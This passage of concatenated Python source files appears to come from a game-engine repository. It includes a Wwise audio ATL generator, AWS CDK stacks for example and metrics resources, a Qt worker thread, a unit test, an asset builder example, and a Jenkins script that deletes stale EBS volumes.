uses the 'name' self.element = __class__.__name__ self.value = WwiseValue(name) def attach_xml(self, node): switch = super().attach_xml(node) self.value.attach_xml(switch) class WwiseState(WwiseType): def __init__(self, name, path): super().__init__(path) # This inits with 'path', the WwiseValue uses the 'name' self.element = __class__.__name__ self.value = WwiseValue(name) def attach_xml(self, node): state = super().attach_xml(node) self.value.attach_xml(state) class WwiseFile(WwiseType): def __init__(self, name, is_loc): super().__init__(name) self.element = __class__.__name__ self.localized = is_loc self.loc_attr = 'wwise_localized' def attach_xml(self, node): wwise_file_node = super().attach_xml(node) if self.localized: wwise_file_node.set(self.loc_attr, 'true') def get_load_types_of_existing_preloads(atl_file): """ Pre-parses the ATL controls file if it exists and returns lists of preloads that were marked as auto-load and ones that weren't. :param atl_file: ATL Controls xml file :return: Lists of preload names that are manual-load and auto-load. """ manual = [] auto = [] if os.path.exists(atl_file): try: atl_doc = ElementTree.parse(atl_file) except ElementTree.ParseError as e: sys.exit('Error parsing {} at line {}, column {}'.format(atl_file, e.position[0], e.position[1])) root = atl_doc.getroot() audio_preloads_node = root.find('./AudioPreloads') if audio_preloads_node is not None: autoloads = audio_preloads_node.findall('./ATLPreloadRequest') for node in autoloads: preload_name = node.get('atl_name') if node.get('atl_type') == 'AutoLoad': auto.append(preload_name) else: manual.append(preload_name) return manual, auto def scan_for_localization_folders(folder): """ Full scan of root folder to determine what paths are 'localized' bank paths. If a folder contains an 'init.bnk' file, then that's considered a main bank folder. Any subfolders of a main bank folder, with the exception of one named 'external', is considered localized. :param folder: Starting root folder for the scan :return: List of localized bank paths """ loc_bank_paths = [] for root, dirs, files in os.walk(folder): if 'init.bnk' in map(str.lower, files): path_gen = (d for d in dirs if d.lower() != 'external') for d in path_gen: loc_bank_paths.append(os.path.join(root, d)) return loc_bank_paths def get_bnktxt_files(folder): """ Recursive generator that yields files in a folder that... 1) Have a .txt extension 2) Have a matching .bnk file next to it :param folder: Starting folder for the search :return: Yields a filepath that conforms with conditions 1 and 2 above """ for f in os.listdir(folder): filepath = os.path.join(folder, f) if os.path.isdir(filepath): for file in get_bnktxt_files(filepath): yield file elif os.path.isfile(filepath) and filepath.endswith('.txt'): bnk_file = filepath.replace('.txt', '.bnk') if os.path.exists(bnk_file): yield filepath def process_simple_types(file, func): line = file.readline().rstrip('\n') while line: columns = line.split('\t') assert len(columns) == 7, 'Column count should be 7 after tokenizing' func(columns[2], columns[5]) line = file.readline().rstrip('\n') def process_switches(file, group_type): global all_switches global all_states line = file.readline().rstrip('\n') while line: columns = line.split('\t') assert len(columns) == 7, 'Column count should be 7 after tokenizing' group = columns[2] path = columns[5] if group_type == SWITCH_TYPE: if group not in all_switches: all_switches[group] = ATLSwitch(group, path) elif group_type == STATE_TYPE: if group not in all_states: all_states[group] = ATLSwitch(group, path) line = file.readline().rstrip('\n') def process_switch_states(file, group_type): global all_switches global all_states line = file.readline().rstrip('\n') while line: columns = line.split('\t') assert len(columns) == 7, 'Column count should be 7 after tokenizing' group = columns[3] child = columns[2] if group_type == SWITCH_TYPE: if group in all_switches: if child not in all_switches[group].states: all_switches[group].states[child] = ATLSwitchState(child, group, group_type) elif group_type == STATE_TYPE: if group in all_states: if child not in all_states[group].states: all_states[group].states[child] = ATLSwitchState(child, group, group_type) line = file.readline().rstrip('\n') def parse_bnktxt_file(file): print('Processing {}'.format(file)) global all_auxbusses global all_events global all_parameters with open(file) as f: line = f.readline() # readline() returns empty string when reaching end of file, so strip the newline inside this while loop. while line: line = line.rstrip('\n') columns = line.split('\t') if columns[0] == 'Auxiliary Bus': process_simple_types(f, lambda name, path: all_auxbusses.add(ATLEnvironment(name, path))) elif columns[0] == 'Event': process_simple_types(f, lambda name, path: all_events.add(ATLTrigger(name, path))) elif columns[0] == 'Game Parameter': process_simple_types(f, lambda name, path: all_parameters.add(ATLRtpc(name, path))) elif columns[0] == 'State Group': process_switches(f, STATE_TYPE) elif columns[0] == 'Switch Group': process_switches(f, SWITCH_TYPE) elif columns[0] == 'State': process_switch_states(f, STATE_TYPE) elif columns[0] == 'Switch': process_switch_states(f, SWITCH_TYPE) line = f.readline() def write_xml_output(filepath): filename = os.path.basename(filepath) filename = os.path.splitext(filename)[0] root = ElementTree.Element('ATLConfig', atl_name=filename) sort_key = attrgetter('name', 'path') envs = ElementTree.SubElement(root, 'AudioEnvironments') for auxbus in sorted(all_auxbusses, key=sort_key): auxbus.attach_xml(envs) rtpcs = ElementTree.SubElement(root, 'AudioRTPCs') for rtpc in sorted(all_parameters, key=sort_key): rtpc.attach_xml(rtpcs) switches = ElementTree.SubElement(root, 'AudioSwitches') for state in sorted(all_states.values(), key=sort_key): state.attach_xml(switches) for switch in sorted(all_switches.values(), key=sort_key): switch.attach_xml(switches) trigs = ElementTree.SubElement(root, 'AudioTriggers') for trigger in sorted(all_events, key=sort_key): trigger.attach_xml(trigs) preloads = ElementTree.SubElement(root, 'AudioPreloads') for preload in sorted(all_preloads, key=sort_key): preload.attach_xml(preloads) # Prettify the XML document before writing # Unfortunately xml.etree does not contain easy pretty printing so transfer the doc to minidom. raw_string = ElementTree.tostring(root) xml_dom = minidom.parseString(raw_string) pretty_string = xml_dom.toprettyxml(indent=' ', encoding='utf-8').decode('UTF-8') try: with open(filepath, mode="w") as f: f.write(pretty_string) except OSError as e: sys.exit('Error: {}'.format(e.strerror)) def run_wwise_atl_gen_tool(): print('Wwise ATL Generator Tool v{}'.format(__version__)) print(__copyright__) print() options = get_options() output_file = os.path.join(options.atlPath, options.atlName) # Pre-parse the output file (if it exists) and split out the preloads into 'manual' and 'auto' load types... manual_preloads, auto_preloads = get_load_types_of_existing_preloads(output_file) localized_bank_paths = scan_for_localization_folders(options.bankPath) # Parse Wwise Bank TXT files for info... for f in get_bnktxt_files(options.bankPath): path, file = os.path.split(f) preload = os.path.splitext(file)[0].lower() is_localized = (path in localized_bank_paths) is_autoload = (preload in auto_preloads) or (options.autoLoad and preload not in manual_preloads) # Skip the ATL Preload for init.bnk, it's automatically loaded at runtime so it doesn't need to be written... if preload != 'init': all_preloads.add(ATLPreloadRequest(preload, 'SoundBanks', is_localized, is_autoload)) parse_bnktxt_file(f) # Debug printing... if options.printDebug: sort_key = attrgetter('name', 'path') print('\nEvents:') for event in sorted(all_events, key=sort_key): print(event) print('\nParameters:') for parameter in sorted(all_parameters, key=sort_key): print(parameter) print('\nAuxBusses:') for auxbus in sorted(all_auxbusses, key=sort_key): print(auxbus) print('\nSwitches:') for switch in sorted(all_switches.values(), key=sort_key): for state in sorted(switch.states.values(), key=sort_key): print(state) print('\nStates:') for switch in sorted(all_states.values(), key=sort_key): for state in sorted(switch.states.values(), key=sort_key): print(state) print('\nSoundBanks:') for bank in sorted(all_preloads, key=sort_key): print(bank) # Output to XML... write_xml_output(output_file) print('Done!') if __name__ == '__main__': run_wwise_atl_gen_tool() ``` #### File: cdk/example/example_resources_stack.py ```python import os from aws_cdk import ( aws_lambda as lambda_, aws_s3 as s3, aws_s3_deployment as s3_deployment, aws_dynamodb as dynamo, core ) from core_stack_properties import CoreStackProperties from .auth import AuthPolicy class ExampleResources(core.Stack): """ Defines a set of resources to use with AWSCore's ScriptBehaviours and examples. The example resources are: * An S3 bucket with a text file * A python 'echo' lambda * A small dynamodb table with the a primary 'id': str key """ def __init__(self, scope: core.Construct, id_: str, project_name: str, feature_name: str, props_: CoreStackProperties, **kwargs) -> None: super().__init__(scope, id_, **kwargs, description=f'Contains resources for the AWSCore examples as part of the ' f'{project_name} project') self._project_name = project_name self._feature_name = feature_name self._policy = AuthPolicy(context=self).generate_admin_policy(stack=self) self._s3_bucket = self.__create_s3_bucket() self._lambda = self.__create_example_lambda() self._table = self.__create_dynamodb_table() self.__create_outputs() # Finally grant cross stack references self.__grant_access(props=props_) def __grant_access(self, props: CoreStackProperties): self._s3_bucket.grant_read(props.user_group) self._s3_bucket.grant_read(props.admin_group) self._lambda.grant_invoke(props.user_group) self._lambda.grant_invoke(props.admin_group) self._table.grant_read_data(props.user_group) self._table.grant_read_data(props.admin_group) def __create_s3_bucket(self) -> s3.Bucket: # Create a sample S3 bucket following S3 best practices # # See https://docs.aws.amazon.com/AmazonS3/latest/dev/security-best-practices.html # 1. Block all public access to the bucket # 2. Use SSE-S3 encryption. Explore encryption at rest options via # https://docs.aws.amazon.com/AmazonS3/latest/userguide/serv-side-encryption.html example_bucket = s3.Bucket( self, f'{self._project_name}-{self._feature_name}-Example-S3bucket', block_public_access=s3.BlockPublicAccess.BLOCK_ALL, encryption=s3.BucketEncryption.S3_MANAGED ) s3_deployment.BucketDeployment( self, f'{self._project_name}-{self._feature_name}-S3bucket-Deployment', destination_bucket=example_bucket, sources=[ s3_deployment.Source.asset('example/s3_content') ], retain_on_delete=False ) return example_bucket def __create_example_lambda(self) -> lambda_.Function: # create lambda function function = lambda_.Function( self, f'{self._project_name}-{self._feature_name}-Lambda-Function', runtime=lambda_.Runtime.PYTHON_3_8, handler="lambda-handler.main", code=lambda_.Code.asset(os.path.join(os.path.dirname(__file__), 'lambda')) ) return function def __create_dynamodb_table(self) -> dynamo.Table: # create dynamo table # NB: CDK does not support seeding data, see simple table_seeder.py demo_table = dynamo.Table( self, f'{self._project_name}-{self._feature_name}-Table', partition_key=dynamo.Attribute( name="id", type=dynamo.AttributeType.STRING ) ) return demo_table def __create_outputs(self) -> None: # Define exports # Export resource group self._s3_output = core.CfnOutput( self, id=f'ExampleBucketOutput', description='An example S3 bucket name to use with AWSCore ScriptBehaviors', export_name=f"{self.stack_name}:ExampleS3Bucket", value=self._s3_bucket.bucket_name) # Define exports # Export resource group self._lambda_output = core.CfnOutput( self, id=f'ExampleLambdaOutput', description='An example Lambda name to use with AWSCore ScriptBehaviors', export_name=f"{self.stack_name}::ExampleLambdaFunction", value=self._lambda.function_name) # Export DynamoDB Table self._table_output = core.CfnOutput( self, id=f'ExampleDynamoTableOutput', description='An example DynamoDB Table name to use with AWSCore ScriptBehaviors', export_name=f"{self.stack_name}:ExampleTable", value=self._table.table_name) # Export user policy self._user_policy = core.CfnOutput( self, id=f'ExampleUserPolicyOutput', description='A User policy to invoke example resources', export_name=f"{self.stack_name}:ExampleUserPolicy", value=self._policy.managed_policy_arn) ``` #### File: ResourceMappingTool/multithread/worker.py ```python import sys import traceback from PySide2.QtCore import (QObject, QRunnable, Signal, Slot) class WorkerSignals(QObject): """ Defines the signals available from a running worker thread """ finished: Signal = Signal() error: Signal = Signal(tuple) result: Signal = Signal(object) class FunctionWorker(QRunnable): """ Custom worker, which is inheriting from QRunnable to handle worker thread setup, signals and wrap-up. """ def __init__(self, function: any, *args: str, **kwargs: int) -> None: super(FunctionWorker, self).__init__() self.function = function self.args = args self.kwargs = kwargs self.signals: WorkerSignals = WorkerSignals() @Slot() def run(self) -> None: try: result: object = self.function(*self.args, **self.kwargs) except: # catch all exceptions for this generic worker traceback.print_exc() exctype, value = sys.exc_info()[:2] self.signals.error.emit((exctype, value, traceback.format_exc())) else: self.signals.result.emit(result) finally: self.signals.finished.emit() ``` #### File: unit/manager/test_configuration_manager.py ```python from typing import List from unittest import TestCase from unittest.mock import (MagicMock, patch) from manager.configuration_manager import ConfigurationManager from model import constants class TestConfigurationManager(TestCase): """ ConfigurationManager unit test cases """ _expected_directory_path: str = "dummy/directory/" _expected_config_files: List[str] = ["dummy.json"] _expected_account_id: str = "1234567890" _expected_region: str = "aws-global" _expected_configuration_manager: ConfigurationManager = ConfigurationManager() def test_get_instance_return_same_instance(self) -> None: assert ConfigurationManager.get_instance() is TestConfigurationManager._expected_configuration_manager def test_get_instance_raise_exception(self) -> None: self.assertRaises(Exception, ConfigurationManager) @patch("utils.aws_utils.setup_default_session") @patch("utils.aws_utils.get_default_region", return_value=_expected_region) @patch("utils.aws_utils.get_default_account_id", return_value=_expected_account_id) @patch("utils.file_utils.find_files_with_suffix_under_directory", return_value=_expected_config_files) @patch("utils.file_utils.check_path_exists", return_value=True) @patch("utils.file_utils.get_current_directory_path", return_value=_expected_directory_path) def test_setup_get_configuration_setup_as_expected(self, mock_get_current_directory_path: MagicMock, mock_check_path_exists: MagicMock, mock_find_files_with_suffix_under_directory: MagicMock, mock_get_default_account_id: MagicMock, mock_get_default_region: MagicMock, mock_setup_default_session: MagicMock) -> None: TestConfigurationManager._expected_configuration_manager.setup("", "") mock_setup_default_session.assert_called_once() mock_get_current_directory_path.assert_called_once() mock_check_path_exists.assert_called_once_with(TestConfigurationManager._expected_directory_path) mock_find_files_with_suffix_under_directory.assert_called_once_with( TestConfigurationManager._expected_directory_path, constants.RESOURCE_MAPPING_CONFIG_FILE_NAME_SUFFIX) mock_get_default_account_id.assert_called_once() mock_get_default_region.assert_called_once() assert TestConfigurationManager._expected_configuration_manager.configuration.config_directory == \ TestConfigurationManager._expected_directory_path assert TestConfigurationManager._expected_configuration_manager.configuration.config_files == \ TestConfigurationManager._expected_config_files assert TestConfigurationManager._expected_configuration_manager.configuration.account_id == \ TestConfigurationManager._expected_account_id assert TestConfigurationManager._expected_configuration_manager.configuration.region == \ TestConfigurationManager._expected_region @patch("utils.aws_utils.setup_default_session") @patch("utils.aws_utils.get_default_region", return_value=_expected_region) @patch("utils.aws_utils.get_default_account_id", return_value=_expected_account_id) @patch("utils.file_utils.find_files_with_suffix_under_directory", return_value=_expected_config_files) @patch("utils.file_utils.check_path_exists", return_value=True) @patch("utils.file_utils.normalize_file_path", return_value=_expected_directory_path) def test_setup_get_configuration_setup_with_path_as_expected(self, mock_normalize_file_path: MagicMock, mock_check_path_exists: MagicMock, mock_find_files_with_suffix_under_directory: MagicMock, mock_get_default_account_id: MagicMock, mock_get_default_region: MagicMock, mock_setup_default_session: MagicMock) -> None: TestConfigurationManager._expected_configuration_manager.setup( "", TestConfigurationManager._expected_directory_path) mock_setup_default_session.assert_called_once() mock_normalize_file_path.assert_called_once() mock_check_path_exists.assert_called_once_with(TestConfigurationManager._expected_directory_path) mock_find_files_with_suffix_under_directory.assert_called_once_with( TestConfigurationManager._expected_directory_path, constants.RESOURCE_MAPPING_CONFIG_FILE_NAME_SUFFIX) mock_get_default_account_id.assert_called_once() mock_get_default_region.assert_called_once() assert TestConfigurationManager._expected_configuration_manager.configuration.config_directory == \ TestConfigurationManager._expected_directory_path assert TestConfigurationManager._expected_configuration_manager.configuration.config_files == \ TestConfigurationManager._expected_config_files assert TestConfigurationManager._expected_configuration_manager.configuration.account_id == \ TestConfigurationManager._expected_account_id assert TestConfigurationManager._expected_configuration_manager.configuration.region == \ TestConfigurationManager._expected_region ``` #### File: cdk/aws_metrics/aws_metrics_stack.py ```python from aws_cdk import ( core ) from .real_time_data_processing import RealTimeDataProcessing from .data_ingestion import DataIngestion from .batch_processing import BatchProcessing from .batch_analytics import BatchAnalytics from .data_lake_integration import DataLakeIntegration from .dashboard import Dashboard class AWSMetricsStack(core.Stack): """ Create the feature stack for the AWSMetrics Gem. Please reference the CloudFormation template provided by the Game Analytics Pipeline for the full production ready solution. This CDK application deploys a simplified version of this pipeline as an example. https://docs.aws.amazon.com/solutions/latest/game-analytics-pipeline/template.html """ def __init__(self, scope: core.Construct, id_: str, application_name: str, optional_features: dict, **kwargs) -> None: super().__init__(scope, id_, **kwargs) self._data_ingestion = DataIngestion(self, application_name) self._real_time_data_processing = RealTimeDataProcessing( self, input_stream_arn=self._data_ingestion.input_stream_arn, application_name=application_name ) batch_processing_enabled = optional_features.get('batch_processing', False) self._data_lake_integration = DataLakeIntegration( self, application_name=application_name ) if batch_processing_enabled else None self._batch_processing = BatchProcessing( self, input_stream_arn=self._data_ingestion.input_stream_arn, analytics_bucket_arn=self._data_lake_integration.analytics_bucket_arn, events_database_name=self._data_lake_integration.events_database_name, events_table_name=self._data_lake_integration.events_table_name ) if batch_processing_enabled else None self._batch_analytics = BatchAnalytics( self, analytics_bucket_name=self._data_lake_integration.analytics_bucket_name, events_database_name=self._data_lake_integration.events_database_name, events_table_name=self._data_lake_integration.events_table_name ) if batch_processing_enabled else None self._dashboard = Dashboard( self, input_stream_name=self._data_ingestion.input_stream_name, application_name=application_name, analytics_processing_lambda_name=self._real_time_data_processing.analytics_processing_lambda_name, delivery_stream_name=self._batch_processing.delivery_stream_name if batch_processing_enabled else '', events_processing_lambda_name=self._batch_processing.events_processing_lambda_name if batch_processing_enabled else '' ) @property def data_ingestion_component(self): return self._data_ingestion @property def real_time_data_processing_component(self): return self._real_time_data_processing @property def dashboard_component(self): return self._dashboard @property def data_lake_integration_component(self): return self._data_lake_integration @property def batch_processing_component(self): return self._batch_processing @property def batch_analytics_component(self): return self._batch_analytics ``` #### File: cdk/aws_metrics/data_lake_integration.py ```python from aws_cdk import ( core, aws_iam as iam, aws_s3 as s3, aws_glue as glue ) from . import aws_metrics_constants class DataLakeIntegration: """ Create the AWS resources including the S3 bucket, Glue database, table and crawler for data lake integration """ def __init__(self, stack: core.Construct, application_name: str) -> None: self._stack = stack self._application_name = application_name self._create_analytics_bucket() self._create_events_database() self._create_events_table() self._create_events_crawler() def _create_analytics_bucket(self) -> None: """ Create a a private bucket that should only be accessed by the resources defined in the CDK application. The bucket uses server-side encryption with a CMK managed by S3: https://docs.aws.amazon.com/AmazonS3/latest/userguide/UsingKMSEncryption.html """ # Bucket name cannot contain uppercase characters # Do not specify the bucket name here since bucket name is required to be unique globally. If we set # a specific name here, only one customer can deploy the bucket successfully. self._analytics_bucket = s3.Bucket( self._stack, id=f'{self._stack.stack_name}-AnalyticsBucket'.lower(), encryption=s3.BucketEncryption.S3_MANAGED, block_public_access=s3.BlockPublicAccess( block_public_acls=True, block_public_policy=True, ignore_public_acls=True, restrict_public_buckets=True ) ) # For Amazon S3 buckets, you must delete all objects in the bucket for deletion to succeed. cfn_bucket = self._analytics_bucket.node.find_child('Resource') cfn_bucket.apply_removal_policy(core.RemovalPolicy.DESTROY) def _create_events_database(self) -> None: """ Create the Glue database for metrics events. """ # Database name cannot contain uppercase characters self._events_database = glue.CfnDatabase( self._stack, id='EventsDatabase', catalog_id=self._stack.account, database_input=glue.CfnDatabase.DatabaseInputProperty( description=f'Metrics events database for stack {self._stack.stack_name}', location_uri=f's3://{self._analytics_bucket.bucket_name}', name=f'{self._stack.stack_name}-EventsDatabase'.lower() ) ) def _create_events_table(self) -> None: """ Create the Glue table for metrics events. This table is used by the Kinesis Data Firehose to convert data from the JSON format to the Parquet format before writing it to Amazon S3. """ self._events_table = glue.CfnTable( self._stack, id=f'EventsTable', catalog_id=self._stack.account, database_name=self._events_database.ref, table_input=glue.CfnTable.TableInputProperty( description=f'Stores metrics event data from the analytics pipeline for stack {self._stack.stack_name}', name=aws_metrics_constants.GLUE_TABLE_NAME, table_type='EXTERNAL_TABLE', partition_keys=[ glue.CfnTable.ColumnProperty( name='year', type='string' ), glue.CfnTable.ColumnProperty( name='month', type='string' ), glue.CfnTable.ColumnProperty( name='day', type='string' ), ], parameters={ 'classification': 'parquet', 'compressionType': 'none', 'typeOfData': 'file' }, storage_descriptor=glue.CfnTable.StorageDescriptorProperty( input_format=aws_metrics_constants.GLUE_TABLE_INPUT_FORMAT, output_format=aws_metrics_constants.GLUE_TABLE_OUTPUT_FORMAT, serde_info=glue.CfnTable.SerdeInfoProperty( serialization_library=aws_metrics_constants.GLUE_TABLE_SERIALIZATION_LIBRARY, parameters={ 'serialization.format': aws_metrics_constants.GLUE_TABLE_SERIALIZATION_LIBRARY_SERIALIZATION_FORMAT } ), stored_as_sub_directories=False, location=f's3://{self._analytics_bucket.bucket_name}/{aws_metrics_constants.GLUE_TABLE_NAME}/', columns=[ glue.CfnTable.ColumnProperty( name='event_id', type='string' ), glue.CfnTable.ColumnProperty( name='event_type', type='string' ), glue.CfnTable.ColumnProperty( name='event_name', type='string' ), glue.CfnTable.ColumnProperty( name='event_timestamp', type='string' ), glue.CfnTable.ColumnProperty( name='event_version', type='string' ), glue.CfnTable.ColumnProperty( name='event_source', type='string' ), glue.CfnTable.ColumnProperty( name='application_id', type='string' ), glue.CfnTable.ColumnProperty( name='event_data', type='string' ) ] ) ) ) def _create_events_crawler(self) -> None: """ Create the Glue crawler to populate the AWS Glue Data Catalog with tables. """ self._create_events_crawler_role() self._events_crawler = glue.CfnCrawler( self._stack, id='EventsCrawler', name=f'{self._stack.stack_name}-EventsCrawler', role=self._events_crawler_role.role_arn, database_name=self._events_database.ref, targets=glue.CfnCrawler.TargetsProperty( s3_targets=[ glue.CfnCrawler.S3TargetProperty( path=f's3://{self._analytics_bucket.bucket_name}/{aws_metrics_constants.GLUE_TABLE_NAME}/' ) ] ), schema_change_policy=glue.CfnCrawler.SchemaChangePolicyProperty( update_behavior='UPDATE_IN_DATABASE', delete_behavior='LOG', ), configuration=aws_metrics_constants.CRAWLER_CONFIGURATION ) events_crawler_output = core.CfnOutput( self._stack, id='EventsCrawlerName', description='Glue Crawler to populate the AWS Glue Data Catalog with metrics events tables', export_name=f"{self._application_name}:EventsCrawler", value=self._events_crawler.name) def _create_events_crawler_role(self) -> None: """ Create the IAM role for the Glue crawler. """ policy_statements = list() s3_policy_statement = iam.PolicyStatement( actions=[ 's3:ListBucket', 's3:GetObject', 's3:PutObject', 's3:DeleteObject' ], effect=iam.Effect.ALLOW, resources=[ self._analytics_bucket.bucket_arn, f'{self._analytics_bucket.bucket_arn}/*' ] ) policy_statements.append(s3_policy_statement) glue_table_policy_statement = iam.PolicyStatement( actions=[ 'glue:BatchGetPartition', 'glue:GetPartition', 'glue:GetPartitions', 'glue:BatchCreatePartition', 'glue:CreatePartition', 'glue:CreateTable', 'glue:GetTable', 'glue:GetTables', 'glue:GetTableVersion', 'glue:GetTableVersions', 'glue:UpdatePartition', 'glue:UpdateTable' ], effect=iam.Effect.ALLOW, resources=[ core.Fn.sub( 'arn:${AWS::Partition}:glue:${AWS::Region}:${AWS::AccountId}:catalog' ), core.Fn.sub( body='arn:${AWS::Partition}:glue:${AWS::Region}:${AWS::AccountId}:table/${EventsDatabase}/*', variables={ 'EventsDatabase': self._events_database.ref } ), core.Fn.sub( body='arn:${AWS::Partition}:glue:${AWS::Region}:${AWS::AccountId}:database/${EventsDatabase}', variables={ 'EventsDatabase': self._events_database.ref } ) ] ) policy_statements.append(glue_table_policy_statement) glue_database_policy_statement = iam.PolicyStatement( actions=[ 'glue:GetDatabase', 'glue:GetDatabases', 'glue:UpdateDatabase' ], effect=iam.Effect.ALLOW, resources=[ core.Fn.sub( 'arn:${AWS::Partition}:glue:${AWS::Region}:${AWS::AccountId}:catalog' ), core.Fn.sub( body='arn:${AWS::Partition}:glue:${AWS::Region}:${AWS::AccountId}:database/${EventsDatabase}', variables={ 'EventsDatabase': self._events_database.ref } ) ] ) policy_statements.append(glue_database_policy_statement) log_policy_statement = iam.PolicyStatement( actions=[ 'logs:CreateLogGroup', 'logs:CreateLogStream', 'logs:PutLogEvents' ], effect=iam.Effect.ALLOW, resources=[ core.Fn.sub( 'arn:${AWS::Partition}:logs:${AWS::Region}:${AWS::AccountId}:log-group:/aws-glue/crawlers:*' ) ] ) policy_statements.append(log_policy_statement) events_crawler_policy_document = iam.PolicyDocument( statements=policy_statements ) self._events_crawler_role = iam.Role( self._stack, id='EventsCrawlerRole', role_name=f'{self._stack.stack_name}-EventsCrawlerRole', assumed_by=iam.ServicePrincipal( service='glue.amazonaws.com' ), inline_policies={ 'GameAnalyticsPipelineGlueCrawlerPolicy': events_crawler_policy_document } ) @property def analytics_bucket_arn(self) -> s3.Bucket.bucket_arn: return self._analytics_bucket.bucket_arn @property def analytics_bucket_name(self) -> s3.Bucket.bucket_name: return self._analytics_bucket.bucket_name @property def events_database_name(self) -> str: return self._events_database.ref @property def events_table_name(self) -> str: return self._events_table.ref @property def events_crawler_name(self) -> str: return self._events_crawler.name @property def events_crawler_role_arn(self) -> iam.Role.role_arn: return self._events_crawler_role.role_arn ``` #### File: Code/Tests/asset_builder_example.py ```python import azlmbr.math import azlmbr.asset.builder import os, shutil # the UUID must be unique amongst all the asset builders in Python or otherwise busIdString = '{E4DB381B-61A0-4729-ACD9-4C8BDD2D2282}' busId = azlmbr.math.Uuid_CreateString(busIdString, 0) assetTypeScript = azlmbr.math.Uuid_CreateString('{82557326-4AE3-416C-95D6-C70635AB7588}', 0) handler = None jobKeyPrefix = 'Foo Job Key' targetAssetFolder = 'foo_scripts' # creates a single job to compile for a 'pc' platform def on_create_jobs(args): request = args[0] # azlmbr.asset.builder.CreateJobsRequest response = azlmbr.asset.builder.CreateJobsResponse() # note: if the asset builder is going to handle more than one file pattern it might need to check out # the request.sourceFile to figure out what jobs need to be created jobDescriptorList = [] for platformInfo in request.enabledPlatforms: # for each enabled platform like 'pc' or 'ios' platformId = platformInfo.identifier # set up unique job key jobKey = '{} {}'.format(jobKeyPrefix, platformId) # create job descriptor jobDesc = azlmbr.asset.builder.JobDescriptor() jobDesc.jobKey = jobKey jobDesc.set_platform_identifier(platformId) jobDescriptorList.append(jobDesc) print ('created a job for {} with key {}'.format(platformId, jobKey)) response.createJobOutputs = jobDescriptorList response.result = azlmbr.asset.builder.CreateJobsResponse_ResultSuccess return response def get_target_name(sourceFullpath): lua_file = os.path.basename(sourceFullpath) lua_file = os.path.splitext(lua_file)[0] lua_file = lua_file + '.lua' return lua_file def copy_foo_file(srcFile, dstFile): try: dir_name = os.path.dirname(dstFile) if (os.path.exists(dir_name) is False): os.makedirs(dir_name) shutil.copyfile(srcFile, dstFile) return True except: return False # using the incoming 'request' find the type of job via 'jobKey' to determine what to do def on_process_job(args): request = args[0] # azlmbr.asset.builder.ProcessJobRequest response = azlmbr.asset.builder.ProcessJobResponse() # note: if possible to loop through incoming data a 'yeild' can be used to cooperatively # thread the processing of the assets so that shutdown and cancel can be handled if (request.jobDescription.jobKey.startswith(jobKeyPrefix)): targetFile = os.path.join(targetAssetFolder, get_target_name(request.fullPath)) dstFile = os.path.join(request.tempDirPath, targetFile) if (copy_foo_file(request.fullPath, dstFile)): response.outputProducts = [azlmbr.asset.builder.JobProduct(dstFile, assetTypeScript, 0)] response.resultCode = azlmbr.asset.builder.ProcessJobResponse_Success response.dependenciesHandled = True return response def on_shutdown(args): # note: user should attempt to close down any processing job if any running global handler if (handler is not None): handler.disconnect() handler = None def on_cancel_job(args): # note: user should attempt to close down any processing job if any running print('>>> FOO asset builder - on_cancel_job <<<') # register asset builder for source assets def register_asset_builder(): assetPattern = azlmbr.asset.builder.AssetBuilderPattern() assetPattern.pattern = '*.foo' assetPattern.type = azlmbr.asset.builder.AssetBuilderPattern_Wildcard builderDescriptor = azlmbr.asset.builder.AssetBuilderDesc() builderDescriptor.name = "Foo Asset Builder" builderDescriptor.patterns = [assetPattern] builderDescriptor.busId = busId builderDescriptor.version = 0 outcome = azlmbr.asset.builder.PythonAssetBuilderRequestBus(azlmbr.bus.Broadcast, 'RegisterAssetBuilder', builderDescriptor) if outcome.IsSuccess(): # created the asset builder handler to hook into the notification bus jobHandler = azlmbr.asset.builder.PythonBuilderNotificationBusHandler() jobHandler.connect(busId) jobHandler.add_callback('OnCreateJobsRequest', on_create_jobs) jobHandler.add_callback('OnProcessJobRequest', on_process_job) jobHandler.add_callback('OnShutdown', on_shutdown) jobHandler.add_callback('OnCancel', on_cancel_job) return jobHandler # note: the handler has to be retained since Python retains the object ref count # on_shutdown will clear the 'handler' to disconnect from the notification bus handler = register_asset_builder() ``` #### File: build/tools/delete_stale_ebs.py ```python import os import requests import traceback import boto3 import json from datetime import datetime from requests.auth import HTTPBasicAuth from urllib.parse import unquote class JenkinsAPIClient: def __init__(self, jenkins_base_url, jenkins_username, jenkins_api_token): self.jenkins_base_url = jenkins_base_url.rstrip('/') self.jenkins_username = jenkins_username self.jenkins_api_token = jenkins_api_token def get(self, url, retry=1): for i in range(retry): try: response = requests.get(url, auth=HTTPBasicAuth(self.jenkins_username, self.jenkins_api_token)) if response.ok: return response.json() except Exception: traceback.print_exc() print(f'WARN: Get request {url} failed, retying....') print(f'WARN: Get request {url} failed, see exception for more details.') def get_pipeline(self, pipeline_name): url = f'{self.jenkins_base_url}/job/{pipeline_name}/api/json' # Use retry because Jenkins API call sometimes may fail when Jenkins server is on high load return self.get(url, retry=3) def get_branch_job(self, pipeline_name, branch_name): url = f'{self.jenkins_base_url}/blue/rest/organizations/jenkins/pipelines/{pipeline_name}/branches/{branch_name}' # Use retry because Jenkins API call sometimes may fail when Jenkins server is on high load return self.get(url, retry=3) def delete_branch_ebs_volumes(branch_name): """ Make a fake branch deleted event and invoke the lambda function that we use to delete branch EBS volumes after a branch is deleted. """ # Unescape branch name as it's URL encoded branch_name = unquote(branch_name) input = { "detail": { "event": "referenceDeleted", "repositoryName": "Lumberyard", "referenceName": branch_name } } client = boto3.client('lambda') # Invoke lambda function "AutoDeleteEBS-Lambda" asynchronously. # This lambda function can have 1000 concurrent runs. # we will setup a SQS/SNS queue to process the events if the event number exceeds the function capacity. client.invoke( FunctionName='AutoDeleteEBS-Lambda', InvocationType='Event', Payload=json.dumps(input), ) def delete_old_branch_ebs_volumes(env): """ Check last run time of each branch build, if it exceeds the retention days, delete the EBS volumes that are tied to the branch. """ branch_volumes_deleted = [] jenkins_client = JenkinsAPIClient(env['JENKINS_URL'], env['JENKINS_USERNAME'], env['JENKINS_API_TOKEN']) today_date = datetime.today().date() pipeline_name = env['PIPELINE_NAME'] pipeline_job = jenkins_client.get_pipeline(pipeline_name) if not pipeline_job: print(f'ERROR: Cannot get data of pipeline job {pipeline_name}.') exit(1) branch_jobs = pipeline_job.get('jobs', []) retention_days = int(env['RETENTION_DAYS']) for branch_job in branch_jobs: branch_name = branch_job['name'] branch_job = jenkins_client.get_branch_job(pipeline_name, branch_name) if not branch_job: print(f'WARN: Cannot get data of {branch_name} job , skipping branch {pipeline_name}.') continue latest_run = 